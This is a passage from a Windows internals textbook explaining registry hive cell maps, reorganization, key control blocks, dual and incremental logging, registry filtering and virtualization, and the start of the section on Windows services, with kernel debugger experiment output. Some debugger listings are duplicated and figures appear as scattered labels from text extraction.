if the name of the subkey the configuration manager is looking for alphabetically precedes the name
of the middle subkey, the configuration manager knows that the subkey is in the first half of the subkey
list; otherwise, the subkey is in the second half of the subkey list. This splitting process continues until
the configuration manager locates the subkey or finds no match. Value-list cells aren’t sorted, however,
so new values are always added to the end of the list.
Cell maps
If hives never grew, the configuration manager could perform all its registry management on the in-
memory version of a hive as if the hive were a file. Given a cell index, the configuration manager could
calculate the location in memory of a cell simply by adding the cell index, which is a hive file offset, to
the base of the in-memory hive image. Early in the system boot, this process is exactly what Winload
does with the SYSTEM hive: Winload reads the entire SYSTEM hive into memory as a read-only hive and
adds the cell indexes to the base of the in-memory hive image to locate cells. Unfortunately, hives grow
as they take on new keys and values, which means the system must allocate new reserved views and
extend the hive file to store the new bins that contain added keys and values. The reserved views that
keep the registry data in memory aren’t necessarily contiguous.
To deal with noncontiguous memory addresses referencing hive data in memory, the configura-
tion manager adopts a strategy similar to what the Windows memory manager uses to map virtual
memory addresses to physical memory addresses. While a cell index is only an offset in the hive file, the
configuration manager employs a two-level scheme, which Figure 10-4 illustrates, when it represents
the hive using the mapped views in the registry process. The scheme takes as input a cell index (that is,
a hive file offset) and returns as output both the address in memory of the block the cell index resides
in and the address in memory of the block the cell resides in. Remember that a bin can contain one or
more blocks and that hives grow in bins, so Windows always represents a bin with a contiguous region
of memory. Therefore, all blocks within a bin occur within the same 2-MB hive’s mapped view.
414
CHAPTER 10 Management, diagnostics, and tracing
Directory index
Table index
Byte offset
Cell index
Target block
Hive’s cell map
directory
Cell map table
32
0
0
1023
Hive cell map directory pointer
0
511
Cell
FIGURE 10-4 Structure of a cell index.
To implement the mapping, the configuration manager divides a cell index logically into fields, in
the same way that the memory manager divides a virtual address into fields. Windows interprets a
cell index’s first field as an index into a hive’s cell map directory. The cell map directory contains 1024
entries, each of which refers to a cell map table that contains 512 map entries. An entry in this cell map
table is specified by the second field in the cell index. That entry locates the bin and block memory ad-
dresses of the cell.
In the final step of the translation process, the configuration manager interprets the last field of the
cell index as an offset into the identified block to precisely locate a cell in memory. When a hive initial-
izes, the configuration manager dynamically creates the mapping tables, designating a map entry for
each block in the hive, and it adds and deletes tables from the cell directory as the changing size of the
hive requires.
Hive reorganization
As for real file systems, registry hives suffer fragmentation problems: when cells in the bin are freed
and it is not possible to coalescence them in a contiguous manner, fragmented little chunks of free
space are created into various bins. If there is not enough available contiguous space for new cells, new
bins are appended at the end of the hive file, while the fragmented ones will be rarely repurposed. To
overcome this problem, starting from Windows 8.1, every time the configuration manager mounts a
hive file, it checks whether a hive’s reorganization needs to be performed. The configuration manager
records the time of the last reorganization in the hive’s basic block. If the hive has valid log files, is not
volatile, and if the time passed after the previous reorganization is greater than seven days, the reor-
ganization operation is started. The reorganization is an operation that has two main goals: shrink the
hive file and optimize it. It starts by creating a new empty hive that is identical to the original one but
does not contains any cells in it. The created clone is used to copy the root key of the original hive, with
all its values (but no subkeys). A complex algorithm analyzes all the child keys: indeed, during its normal
CHAPTER 10 Management, diagnostics, and tracing
415
activity, the configuration manager records whether a particular key is accessed, and, if so, stores an
index representing the current runtime phase of the operating system (Boot or normal) in its key cell.
The reorganization algorithm first copies the keys accessed during the normal execution of the OS,
then the ones accessed during the boot phase, and finally the keys that have not been accessed at all
(since the last reorganization). This operation groups all the different keys in contiguous bins of the hive
file. The copy operation, by definition, produces a nonfragmented hive file (each cell is stored sequentially
in the bin, and new bin are always appended at the end of the file). Furthermore, the new hive has the
characteristic to contain hot and cold classes of keys stored in big contiguous chunks. This result renders
the boot and runtime phase of the operating system much quicker when reading data from the registry.
The reorganization algorithm resets the access state of all the new copied cells. In this way, the
system can track the hive’s keys usage by restarting from a neutral state. The new usage statistics will
be consumed by the next reorganization, which will start after seven days. The configuration manager
stores the results of a reorganization cycle in the HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Configuration Manager\Defrag registry key, as shown in Figure 10-5. In the sample screen-
shot, the last reorganization was run on April 10, 2019 and saved 10 MB of fragmented hive space.
FIGURE 10-5 Registry reorganization data.
The registry namespace and operation
The configuration manager defines a key object type to integrate the registry’s namespace with the
kernel’s general namespace. The configuration manager inserts a key object named Registry into the
root of the Windows namespace, which serves as the entry point to the registry. Regedit shows key
names in the form HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet, but the Windows subsystem
translates such names into their object namespace form (for example, \Registry\Machine\System\
CurrentControlSet). When the Windows object manager parses this name, it encounters the key
416
CHAPTER 10 Management, diagnostics, and tracing
object by the name of Registry first and hands the rest of the name to the configuration manager. The
configuration manager takes over the name parsing, looking through its internal hive tree to find the
desired key or value. Before we describe the flow of control for a typical registry operation, we need
to discuss key objects and key control blocks. Whenever an application opens or creates a registry key,
the object manager gives a handle with which to reference the key to the application. The handle cor-
responds to a key object that the configuration manager allocates with the help of the object manager.
By using the object manager’s object support, the configuration manager takes advantage of the
security and reference-counting functionality that the object manager provides.
For each open registry key, the configuration manager also allocates a key control block. A key
control block stores the name of the key, includes the cell index of the key node that the control block
refers to, and contains a flag that notes whether the configuration manager needs to delete the key
cell that the key control block refers to when the last handle for the key closes. Windows places all key
control blocks into a hash table to enable quick searches for existing key control blocks by name. A key
object points to its corresponding key control block, so if two applications open the same registry key,
each receives a key object, and both key objects point to a common key control block.
When an application opens an existing registry key, the flow of control starts with the applica-
tion specifying the name of the key in a registry API that invokes the object manager’s name-parsing
routine. The object manager, upon encountering the configuration manager’s registry key object in the
namespace, hands the path name to the configuration manager. The configuration manager performs
a lookup on the key control block hash table. If the related key control block is found there, there’s no
need for any further work (no registry process attach is needed); otherwise, the lookup provides the
configuration manager with the closest key control block to the searched key, and the lookup con-
tinues by attaching to the registry process and using the in-memory hive data structures to search
through keys and subkeys to find the specified key. If the configuration manager finds the key cell, the
configuration manager searches the key control block tree to determine whether the key is open (by
the same application or another one). The search routine is optimized to always start from the clos-
est ancestor with a key control block already opened. For example, if an application opens \Registry\
Machine\Key1\Subkey2, and \Registry\Machine is already open, the parse routine uses the key control
block of \Registry\Machine as a starting point. If the key is open, the configuration manager incre-
ments the existing key control block’s reference count. If the key isn’t open, the configuration manager
allocates a new key control block and inserts it into the tree. Then the configuration manager allocates
a key object, points the key object at the key control block, detaches from the Registry process, and
returns control to the object manager, which returns a handle to the application.
When an application creates a new registry key, the configuration manager first finds the key cell
for the new key’s parent. The configuration manager then searches the list of free cells for the hive in
which the new key will reside to determine whether cells exist that are large enough to hold the new
key cell. If there aren’t any free cells large enough, the configuration manager allocates a new bin and
uses it for the cell, placing any space at the end of the bin on the free cell list. The new key cell fills with
pertinent information—including the key’s name—and the configuration manager adds the key cell to
the subkey list of the parent key’s subkey-list cell. Finally, the system stores the cell index of the parent
cell in the new subkey’s key cell.
CHAPTER 10 Management, diagnostics, and tracing
417
The configuration manager uses a key control block’s reference count to determine when to delete
the key control block. When all the handles that refer to a key in a key control block close, the reference
count becomes 0, which denotes that the key control block is no longer necessary. If an application that
calls an API to delete the key sets the delete flag, the configuration manager can delete the associated
key from the key’s hive because it knows that no application is keeping the key open.
EXPERIMENT: Viewing key control blocks
You can use the kernel debugger to list all the key control blocks allocated on a system with the
!reg openkeys command. Alternatively, if you want to view the key control block for a particular
open key, use !reg querykey:
0: kd> !reg querykey \Registry\machine\software\microsoft
Found KCB = ffffae08c156ae60 :: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT
Hive
ffffae08c03b0000
KeyNode
00000225e8c3475c
[SubKeyAddr]
[SubKeyName]
225e8d23e64
.NETFramework
225e8d24074
AccountsControl
225e8d240d4
Active Setup
225ec530f54
ActiveSync
225e8d241d4
Ads
225e8d2422c
Advanced INF Setup
225e8d24294
ALG
225e8d242ec
AllUserInstallAgent
225e8d24354
AMSI
225e8d243f4
Analog
225e8d2448c
AppServiceProtocols
225ec661f4c
AppV
225e8d2451c
Assistance
225e8d2458c
AuthHost
...
You can then examine a reported key control block with the !reg kcb command:
kd> !reg kcb ffffae08c156ae60
Key
: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT
RefCount
: 1f
Flags
: CompressedName, Stable
ExtFlags
:
Parent
: 0xe1997368
KeyHive
: 0xe1c8a768
KeyCell
: 0x64e598 [cell index]
TotalLevels
: 4
DelayedCloseIndex: 2048
MaxNameLen : 0x3c
MaxValueNameLen : 0x0
MaxValueDataLen : 0x0
LastWriteTime : 0x1c42501:0x7eb6d470
KeyBodyListHead : 0xe1034d70 0xe1034d70
EXPERIMENT: Viewing key control blocks
You can use the kernel debugger to list all the key control blocks allocated on a system with the
!reg openkeys command. Alternatively, if you want to view the key control block for a particular
open key, use !reg querykey:
0: kd> !reg querykey \Registry\machine\software\microsoft
Found KCB = ffffae08c156ae60 :: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT
Hive
ffffae08c03b0000
KeyNode
00000225e8c3475c
[SubKeyAddr]
[SubKeyName]
225e8d23e64
.NETFramework
225e8d24074
AccountsControl
225e8d240d4
Active Setup
225ec530f54
ActiveSync
225e8d241d4
Ads
225e8d2422c
Advanced INF Setup
225e8d24294
ALG
225e8d242ec
AllUserInstallAgent
225e8d24354
AMSI
225e8d243f4
Analog
225e8d2448c
AppServiceProtocols
225ec661f4c
AppV
225e8d2451c
Assistance
225e8d2458c
AuthHost
...
You can then examine a reported key control block with the !reg kcb command:
kd> !reg kcb ffffae08c156ae60
Key
: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT
RefCount
: 1f
Flags
: CompressedName, Stable
ExtFlags
:
Parent
: 0xe1997368
KeyHive
: 0xe1c8a768
KeyCell
: 0x64e598 [cell index]
TotalLevels
: 4
DelayedCloseIndex: 2048
MaxNameLen : 0x3c
MaxValueNameLen : 0x0
MaxValueDataLen : 0x0
LastWriteTime : 0x1c42501:0x7eb6d470
KeyBodyListHead : 0xe1034d70 0xe1034d70
418
CHAPTER 10 Management, diagnostics, and tracing
SubKeyCount
: 137
ValueCache.Count : 0
KCBLock
: 0xe1034d40
KeyLock
: 0xe1034d40
The Flags field indicates that the name is stored in compressed form, and the SubKeyCount
field shows that the key has 137 subkeys.
Stable storage
To make sure that a nonvolatile registry hive (one with an on-disk file) is always in a recoverable state,
the configuration manager uses log hives. Each nonvolatile hive has an associated log hive, which is a
hidden file with the same base name as the hive and a logN extension. To ensure forward progress, the
configuration manager uses a dual-logging scheme. There are potentially two log files: .log1 and .log2.
If, for any reason, .log1 was written but a failure occurred while writing dirty data to the primary log
file, the next time a flush happens, a switch to .log2 occurs with the cumulative dirty data. If that fails
as well, the cumulative dirty data (the data in .log1 and the data that was dirtied in between) is saved in
.log2. As a consequence, .log1 will be used again next time around, until a successful write operation is
done to the primary log file. If no failure occurs, only .log1 is used.
For example, if you look in your %SystemRoot%\System32\Config directory (and you have the
Show Hidden Files And Folders folder option selected and Hide Protected Operating System
Files unselected; otherwise, you won’t see any file), you’ll see System.log1, Sam.log1, and other .log1
and .log2 files. When a hive initializes, the configuration manager allocates a bit array in which each bit
represents a 512-byte portion, or sector, of the hive. This array is called the dirty sector array because a
bit set in the array means that the system has modified the corresponding sector in the hive in memory
and must write the sector back to the hive file. (A bit not set means that the corresponding sector is up
to date with the in-memory hive’s contents.)
When the creation of a new key or value or the modification of an existing key or value takes place, the
configuration manager notes the sectors of the primary hive that change and writes them in the hive’s
dirty sectors array in memory. Then the configuration manager schedules a lazy flush operation, or a log
sync. The hive lazy writer system thread wakes up one minute after the request to synchronize the hive’s
log. It generates new log entries from the in-memory hive sectors referenced by valid bits of the dirty
sectors array and writes them to the hive log files on disk. At the same time, the system flushes all the reg-
istry modifications that take place between the time a hive sync is requested and the time the hive sync
occurs. The lazy writer uses low priority I/Os and writes dirty sectors to the log file on disk (and not to the
primary hive). When a hive sync takes place, the next hive sync occurs no sooner than one minute later.
If the lazy writer simply wrote all a hive’s dirty sectors to the hive file and the system crashed in mid-
operation, the hive file would be in an inconsistent (corrupted) and unrecoverable state. To prevent
such an occurrence, the lazy writer first dumps the hive’s dirty sector array and all the dirty sectors to
the hive’s log file, increasing the log file’s size if necessary. A hive’s basic block contains two sequence
numbers. After the first flush operation (and not in the subsequent flushes), the configuration manager
updates one of the sequence number, which become bigger than the second one. Thus, if the system
SubKeyCount
: 137
ValueCache.Count : 0
KCBLock
: 0xe1034d40
KeyLock
: 0xe1034d40
The Flags field indicates that the name is stored in compressed form, and the SubKeyCount
field shows that the key has 137 subkeys.
CHAPTER 10 Management, diagnostics, and tracing
419
crashes during the write operations to the hive, at the next reboot the configuration manager notices
that the two sequence numbers in the hive’s base block don’t match. The configuration manager can
update the hive with the dirty sectors in the hive’s log file to roll the hive forward. The hive is then up
to date and consistent.
After writing log entries in the hive’s log, the lazy flusher clears the corresponding valid bits in the
dirty sector array but inserts those bits in another important vector: the unreconciled array. The latter
is used by the configuration manager to understand which log entries to write in the primary hive.
Thanks to the new incremental logging support (discussed later), the primary hive file is rarely written
during the runtime execution of the operating system. The hive’s sync protocol (not to be confused by
the log sync) is the algorithm used to write all the in-memory and in-log registry’s modifications to the
primary hive file and to set the two sequence numbers in the hive. It is indeed an expensive multistage
operation that is described later.
The Reconciler, which is another type of lazy writer system thread, wakes up once every hour, freez-
es up the log, and writes all the dirty log entries in the primary hive file. The reconciliation algorithm
knows which parts of the in-memory hive to write to the primary file thanks to both the dirty sectors
and unreconciled array. Reconciliation happens rarely, though. If a system crashes, the configuration
manager has all the information needed to reconstruct a hive, thanks to the log entries that have been
already written in the log files. Performing registry reconciliation only once per hour (or when the size
of the log is behind a threshold, which depends on the size of the volume in which the hive reside) is a
big performance improvement. The only possible time window in which some data loss could happen
in the hive is between log flushes.
Note that the Reconciliation still does not update the second sequence number in the main hive file.
The two sequence numbers will be updated with an equal value only in the “validation” phase (another
form of hive flushing), which happens only at the hive’s unload time (when an application calls the
RegUnloadKey API), when the system shuts down, or when the hive is first loaded. This means that in
most of the lifetime of the operating system, the main registry hive is in a dirty state and needs its log
file to be correctly read.
The Windows Boot Loader also contains some code related to registry reliability. For example, it can
parse the System.log file before the kernel is loaded and do repairs to fix consistency. Additionally, in
certain cases of hive corruption (such as if a base block, bin, or cell contains data that fails consistency
checks), the configuration manager can reinitialize corrupted data structures, possibly deleting subkeys
in the process, and continue normal operation. If it must resort to a self-healing operation, it pops up a
system error dialog box notifying the user.
Incremental logging
As mentioned in the previous section, Windows 8.1 introduced a big improvement on the performance
of the hive sync algorithm thanks to incremental logging. Normally, cells in a hive file can be in four
different states:
I
Clean The cell’s data is in the hive’s primary file and has not been modified.
I
Dirty The cell’s data has been modified but resides only in memory.
420
CHAPTER 10 Management, diagnostics, and tracing
I
Unreconciled The cell’s data has been modified and correctly written to a log file but isn’t in
the primary file yet.
I
Dirty and Unreconciled After the cell has been written to the log file, it has been modified
again. Only the first modification is on the log file, whereas the last one resides in memory only.
The original pre-Windows 8.1 synchronization algorithm was executing five seconds after one or
more cells were modified. The algorithm can be summarized in four steps:
1.
The configuration manager writes all the modified cells signaled by the dirty vector in a single
entry in the log file.
2.
It invalidates the hive’s base block (by setting only one sequence number with an incremented
value than the other one).
3.
It writes all the modified data on the primary hive’s file.
4.
It performs the validation of the primary hive (the validation sets the two sequence numbers
with an identical value in the primary hive file).
To maintain the integrity and the recoverability of the hive, the algorithm should emit a flush opera-
tion to the file system driver after each phase; otherwise, corruption could happen. Flush operations on
random access data can be very expensive (especially on standard rotation disks).
Incremental logging solved the performance problem. In the legacy algorithm, one single log entry
was written containing all the dirty data between multiple hive validations; the incremental model
broke this assumption. The new synchronization algorithm writes a single log entry every time the
lazy flusher executes, which, as discussed previously, invalidates the primary hive’s base block only in
the first time it executes. Subsequent flushes continue to write new log entries without touching the
hive’s primary file. Every hour, or if the space in the log exhausts, the Reconciler writes all the data
stored in the log entries to the primary hive’s file without performing the validation phase. In this way,
space in the log file is reclaimed while maintaining the recoverability of the hive. If the system crashes
at this stage, the log contains original entries that will be reapplied at hive loading time; otherwise,
new entries are reapplied at the beginning of the log, and, in case the system crashes later, at hive load
time only the new entries in the log are applied.
Figure 10-6 shows the possible crash situations and how they are managed by the incremental log-
ging scheme. In case A, the system has written new data to the hive in memory, and the lazy flusher
has written the corresponding entries in the log (but no reconciliation happened). When the system
restarts, the recovery procedure applies all the log entries to the primary hive and validates the hive file
again. In case B, the reconciler has already written the data stored in the log entries to the primary hive
before the crash (no hive validation happened). At system reboot, the recovery procedure reapplies the
existing log entries, but no modification in the primary hive file are made. Case C shows a similar situ-
ation of case B but where a new entry has been written to the log after the reconciliation. In this case,
the recovery procedure writes only the last modification that is not in the primary file.
CHAPTER 10 Management, diagnostics, and tracing
421
A. Non reconciled invalid hive
B. Reconciled invalid hive
BASE Block
SEQ 1
9431
SEQ 2
9434
BIN
BIN
BIN
Key Cell
Big Value
Value list
Sec Desc
Key Cell
Unreconcil
Big value
Sec Desc
Key Cell
Sec Desc
Value list
Subkey list
Value Cell
SubKey list
Unreconcil
…
Big value
SubKey list
Key Cell
…
Value Cell
Unreconcil
Key Cell
…
Log BASE Block
SEQ 1
9550
SEQ 2
9550
Entry 9560
Entry 9561
Entry 9562
Last valid
entry
BASE Block
SEQ 1
9431
SEQ 2
9434
BIN
BIN
BIN
Key Cell
Big Value
Value list
Sec Desc
Key Cell
Value list
Big value
Sec Desc
Key Cell
Sec Desc
Value list
Subkey list
Value Cell
SubKey list
Key Cell
…
Big value
SubKey list
Key Cell
…
Value Cell
Big value
Key Cell
…
Log BASE Block
SEQ 1
9550
SEQ 2
9550
Entry 9560
…
Entry 9561
Entry 9562
Last valid
entry
C. Reconciled invalid hive with new data
BASE Block
SEQ 1
9431
SEQ 2
9434
BIN
BIN
BIN
Key Cell
Big Value
Value list
Sec Desc
Key Cell
Value list
Big value
Sec Desc
Key Cell
Sec Desc
Value list
Subkey list
Value Cell
SubKey list
Key Cell
…
Big value
SubKey list
Unreconcil
…
Value Cell
Big value
Key Cell
…
Log BASE Block
SEQ 1
9563
SEQ 2
9563
Entry 9563
Invalid
End of log
Last valid
entry
FIGURE 10-6 Consequences of possible system crashes in different times.
The hive’s validation is performed only in certain (rare) cases. When a hive is unloaded, the system
performs reconciliation and then validates the hive’s primary file. At the end of the validation, it sets the
two sequence numbers of the hive’s primary file to a new identical value and emits the last file system
flush request before unloading the hive from memory. When the system restarts, the hive load’s code
detects that the hive primary is in a clean state (thanks to the two sequence numbers having the same
value) and does not start any form of the hive’s recovery procedure. Thanks to the new incremental
synchronization protocol, the operating system does not suffer any longer for the performance penal-
ties brought by the old legacy logging protocol.
Note Loading a hive created by Windows 8.1 or a newer operating system in older machines
is problematic in case the hive’s primary file is in a non-clean state. The old OS (Windows 7,
for example) has no idea how to process the new log files. For this reason, Microsoft created
the RegHiveRecovery minifilter driver, which is distributed through the Windows Assessment
and Deployment Kit (ADK). The RegHiveRecovery driver uses Registry callbacks, which in-
tercept “hive load” requests from the system and determine whether the hive’s primary file
needs recovery and uses incremental logs. If so, it performs the recovery and fixes the hive’s
primary file before the system has a chance to read it.
422
CHAPTER 10 Management, diagnostics, and tracing
Registry filtering
The configuration manager in the Windows kernel implements a powerful model of registry filtering,
which allows for monitoring of registry activity by tools such as Process Monitor. When a driver uses
the callback mechanism, it registers a callback function with the configuration manager. The configura-
tion manager executes the driver’s callback function before and after the execution of registry system
services so that the driver has full visibility and control over registry accesses. Antivirus products that
scan registry data for viruses or prevent unauthorized processes from modifying the registry are other
users of the callback mechanism.
Registry callbacks are also associated with the concept of altitudes. Altitudes are a way for differ-
ent vendors to register a “height” on the registry filtering stack so that the order in which the system
calls each callback routine can be deterministic and correct. This avoids a scenario in which an anti-
virus product would scan encrypted keys before an encryption product would run its own callback
to decrypt them. With the Windows registry callback model, both types of tools are assigned a base
altitude corresponding to the type of filtering they are doing—in this case, encryption versus scanning.
Secondly, companies that create these types of tools must register with Microsoft so that within their
own group, they will not collide with similar or competing products.
The filtering model also includes the ability to either completely take over the processing of the
registry operation (bypassing the configuration manager and preventing it from handling the request)
or redirect the operation to a different operation (such as WoW64’s registry redirection). Additionally,
it is also possible to modify the output parameters as well as the return value of a registry operation.
Finally, drivers can assign and tag per-key or per-operation driver-defined information for their own
purposes. A driver can create and assign this context data during a create or open operation, which the
configuration manager remembers and returns during each subsequent operation on the key.
Registry virtualization
Windows 10 Anniversary Update (RS1) introduced registry virtualization for Argon and Helium contain-
ers and the possibility to load differencing hives, which adhere to the new hive version 1.6. Registry
virtualization is provided by both the configuration manager and the VReg driver (integrated in the
Windows kernel). The two components provide the following services:
I
Namespace redirection An application can redirect the content of a virtual key to a real one
in the host. The application can also redirect a virtual key to a key belonging to a differencing
hive, which is merged to a root key in the host.
I
Registry merging Differencing hives are interpreted as a set of differences from a base hive.
The base hive represents the Base Layer, which contains the Immutable registry view. Keys in
a differencing hive can be an addition to the base one or a subtraction. The latter are called
thumbstone keys.
CHAPTER 10 Management, diagnostics, and tracing
423
The configuration manager, at phase 1 of the OS initialization, creates the VRegDriver device
object (with a proper security descriptor that allows only SYSTEM and Administrator access) and
the VRegConfigurationContext object type, which represents the Silo context used for tracking the
namespace redirection and hive merging, which belongs to the container. Server silos have been cov-
ered already in Chapter 3, “Processes and jobs,” of Part 1.
Namespace redirection
Registry namespace redirection can be enabled only in a Silo container (both Server and applications
silos). An application, after it has created the silo (but before starting it), sends an initialization IOCTL
to the VReg device object, passing the handle to the silo. The VReg driver creates an empty configura-
tion context and attaches it to the Silo object. It then creates a single namespace node, which remaps
the \Registry\WC root key of the container to the host key because all containers share the same view
of it. The \Registry\WC root key is created for mounting all the hives that are virtualized for the silo
containers.
The VReg driver is a registry filter driver that uses the registry callbacks mechanism for properly
implementing the namespace redirection. At the first time an application initializes a namespace redi-
rection, the VReg driver registers its main RegistryCallback notification routine (through an internal API
similar to CmRegisterCallbackEx). To properly add namespace redirection to a root key, the application
sends a Create Namespace Node IOCTL to the VReg’s device and specifies the virtual key path (which
will be seen by the container), the real host key path, and the container’s job handle. As a response,
the VReg driver creates a new namespace node (a small data structure that contains the key’s data and
some flags) and adds it to the silo’s configuration context.
After the application has finished configuring all the registry redirections for the container, it at-
taches its own process (or a new spawned process) to the silo object (using AssignProcessToJobObject—
see Chapter 3 in Part 1 for more details). From this point forward, each registry I/O emitted by the
containerized process will be intercepted by the VReg registry minifilter. Let’s illustrate how namespace
redirection works through an example.
Let’s assume that the modern application framework has set multiple registry namespace redirec-
tions for a Centennial application. In particular, one of the redirection nodes redirect keys from HKCU
to the host \Registry\WC\ a20834ea-8f46-c05f-46e2-a1b71f9f2f9cuser_sid key. At a certain point
in time, the Centennial application wants to create a new key named AppA in the HKCU\Software\
Microsoft parent key. When the process calls the RegCreateKeyEx API, the Vreg registry callback inter-
cepts the request and gets the job’s configuration context. It then searches in the context the closest
namespace node to the key’s path specified by the caller. If it does not find anything, it returns an
object not found error: Operating on nonvirtualized paths is not allowed for a container. Assuming that
a namespace node describing the root HKCU key exists in the context, and the node is a parent of the
HKCU\Software\Microsoft subkey, the VReg driver replaces the relative path of the original virtual key
with the parent host key name and forwards the request to the configuration manager. So, in this case
the configuration manager really sees a request to create \Registry\WC\a20834ea-8f46-c05f-46e2-
a1b71f9f2f9cuser_sid\Software\Microsoft\ AppA and succeeds. The containerized application does not
really detect any difference. From the application side, the registry key is in the host HKCU.
424
CHAPTER 10 Management, diagnostics, and tracing
Differencing hives
While namespace redirection is implemented in the VReg driver and is available only in contain-
erized environments, registry merging can also work globally and is implemented mainly in the
configuration manager itself. (However, the VReg driver is still used as an entry-point, allowing the
mounting of differencing hives to base keys.) As stated in the previous section, differencing hives use
hive version 1.6, which is very similar to version 1.5 but supports metadata for the differencing keys.
Increasing the hive version also prevents the possibility of mounting the hive in systems that do not
support registry virtualization.
An application can create a differencing hive and mount it globally in the system or in a silo con-
tainer by sending IOCTLs to the VReg device. The Backup and Restore privileges are needed, though,
so only administrative applications can manage differencing hives. To mount a differencing hive, the
application fills a data structure with the name of the base key (called the base layer; a base layer is the
root key from which all the subkeys and values contained in the differencing hive applies), the path of
the differencing hive, and a mount point. It then sends the data structure to the VReg driver through
the VR_LOAD_DIFFERENCING_HIVE control code. The mount point contains a merge of the data con-
tained in the differencing hive and the data contained in the base layer.
The VReg driver maintains a list of all the loaded differencing hives in a hash table. This allows the
VReg driver to mount a differencing hive in multiple mount points. As introduced previously, the
Modern Application Model uses random GUIDs in the \Registry\WC root key with the goal to mount
independent Centennial applications’ differencing hives. After an entry in the hash table is created,
the VReg driver simply forwards the request to the CmLoadDifferencingKey internal configuration
manager’s function. The latter performs the majority of the work. It calls the registry callbacks and
loads the differencing hive. The creation of the hive proceeds in a similar way as for a normal hive. After
the hive is created by the lower layer of the configuration manager, a key control block data structure
is also created. The new key control block is linked to the base layer key control block.
When a request is directed to open or read values located in the key used as a mount point, or
in a child of it, the configuration manager knows that the associated key control block represents a
differencing hive. So, the parsing procedure starts from the differencing hive. If the configuration
manager encounters a subkey in the differencing hive, it stops the parsing procedure and yields the
keys and data stored in the differencing hive. Otherwise, in case no data is found in the differencing
hive, the configuration manager restarts the parsing procedure from the base hive. Another case veri-
fies whether a thumbstone key is found in the differencing hive: the configuration manager hides the
searched key and returns no data (or an error). Thumb stones are indeed used to mark a key as deleted
in the base hive.
The system supports three kinds of differencing hives:
I
Mutable hives can be written and updated. All the write requests directed to the mount point
(or to its children keys) are stored in the differencing hive.
I
Immutable hives can’t be modified. This means that all the modifications requested on a key
that is located in the differencing hive will fail.
CHAPTER 10 Management, diagnostics, and tracing
425
I
Write-through hives represent differencing hives that are immutable, but write requests
directed to the mount point (or its children keys) are redirected to the base layer (which is not
immutable anymore).
The NT kernel and applications can also mount a differencing hive and then apply namespace
redirection on the top of its mount point, which allows the implementation of complex virtualized
configurations like the one employed for Centennial applications (shown in Figure 10-7). The Modern
Application Model and the architecture of Centennial applications are covered in Chapter 8.
Centennial App 12
Centennial App 24
Namespace redirection
Mount
points
Registry merging
Loaded from
C:\ProgramData\Packages\Centennial.Test.App12
*Loaded from
C:\ProgramData\Packages\Centennial.Test.App24
Silo 12
HKLM\Software
Silo12Software
Silo 24
HKLM\Software
Silo12Software
Host HKLM\Software
Host\Registry\WC
FIGURE 10-7 Registry virtualization of the software hive in the Modern Application Model for
Centennial applications.
Registry optimizations
The configuration manager makes a few noteworthy performance optimizations. First, virtually every
registry key has a security descriptor that protects access to the key. However, storing a unique security
descriptor copy for every key in a hive would be highly inefficient because the same security settings
often apply to entire subtrees of the registry. When the system applies security to a key, the configura-
tion manager checks a pool of the unique security descriptors used within the same hive as the key
to which new security is being applied, and it shares any existing descriptor for the key, ensuring that
there is at most one copy of every unique security descriptor in a hive.
The configuration manager also optimizes the way it stores key and value names in a hive. Although
the registry is fully Unicode-capable and specifies all names using the Unicode convention, if a name
contains only ASCII characters, the configuration manager stores the name in ASCII form in the hive.
426
CHAPTER 10 Management, diagnostics, and tracing
When the configuration manager reads the name (such as when performing name lookups), it converts
the name into Unicode form in memory. Storing the name in ASCII form can significantly reduce the
size of a hive.
To minimize memory usage, key control blocks don’t store full key registry path names. Instead,
they reference only a key’s name. For example, a key control block that refers to \Registry\System\
Control would refer to the name Control rather than to the full path. A further memory optimization is
that the configuration manager uses key name control blocks to store key names, and all key control
blocks for keys with the same name share the same key name control block. To optimize performance,
the configuration manager stores the key control block names in a hash table for quick lookups.
To provide fast access to key control blocks, the configuration manager stores frequently accessed
key control blocks in the cache table, which is configured as a hash table. When the configuration
manager needs to look up a key control block, it first checks the cache table. Finally, the configuration
manager has another cache, the delayed close table, that stores key control blocks that applications
close so that an application can quickly reopen a key it has recently closed. To optimize lookups, these
cache tables are stored for each hive. The configuration manager removes the oldest key control blocks
from the delayed close table because it adds the most recently closed blocks to the table.
Windows services
Almost every operating system has a mechanism to start processes at system startup time not tied
to an interactive user. In Windows, such processes are called services or Windows services. Services
are similar to UNIX daemon processes and often implement the server side of client/server applica-
tions. An example of a Windows service might be a web server because it must be running regardless
of whether anyone is logged on to the computer, and it must start running when the system starts so
that an administrator doesn’t have to remember, or even be present, to start it.
Windows services consist of three components: a service application, a service control program
(SCP), and the Service Control Manager (SCM). First, we describe service applications, service accounts,
user and packaged services, and all the operations of the SCM. Then we explain how autostart services
are started during the system boot. We also cover the steps the SCM takes when a service fails during
its startup and the way the SCM shuts down services. We end with the description of the Shared service
process and how protected services are managed by the system.
Service applications
Service applications, such as web servers, consist of at least one executable that runs as a Windows
service. A user who wants to start, stop, or configure a service uses a SCP. Although Windows supplies
built-in SCPs (the most common are the command-line tool sc.exe and the user interface provided
by the services.msc MMC snap-in) that provide generic start, stop, pause, and continue functionality,
some service applications include their own SCP that allows administrators to specify configuration set-
tings particular to the service they manage.
CHAPTER 10 Management, diagnostics, and tracing
427
Service applications are simply Windows executables (GUI or console) with additional code to
receive commands from the SCM as well as to communicate the application’s status back to the SCM.
Because most services don’t have a user interface, they are built as console programs.
When you install an application that includes a service, the application’s setup program (which
usually acts as an SCP too) must register the service with the system. To register the service, the setup
program calls the Windows CreateService function, a services-related function exported in Advapi32.
dll (%SystemRoot%\System32\ Advapi32.dll). Advapi32, the Advanced API DLL, implements only a
small portion of the client-side SCM APIs. All the most important SCM client APIs are implemented in
another DLL, Sechost.dll, which is the host library for SCM and LSA client APIs. All the SCM APIs not
implemented in Advapi32.dll are simply forwarded to Sechost.dll. Most of the SCM client APIs commu-
nicate with the Service Control Manager through RPC. SCM is implemented in the Services.exe binary.
More details are described later in the “Service Control Manager” section.
When a setup program registers a service by calling CreateService, an RPC call is made to the SCM
instance running on the target machine. The SCM then creates a registry key for the service under
HKLM\SYSTEM\CurrentControlSet\Services. The Services key is the nonvolatile representation of the
SCM’s database. The individual keys for each service define the path of the executable image that con-
tains the service as well as parameters and configuration options.
After creating a service, an installation or management application can start the service via the
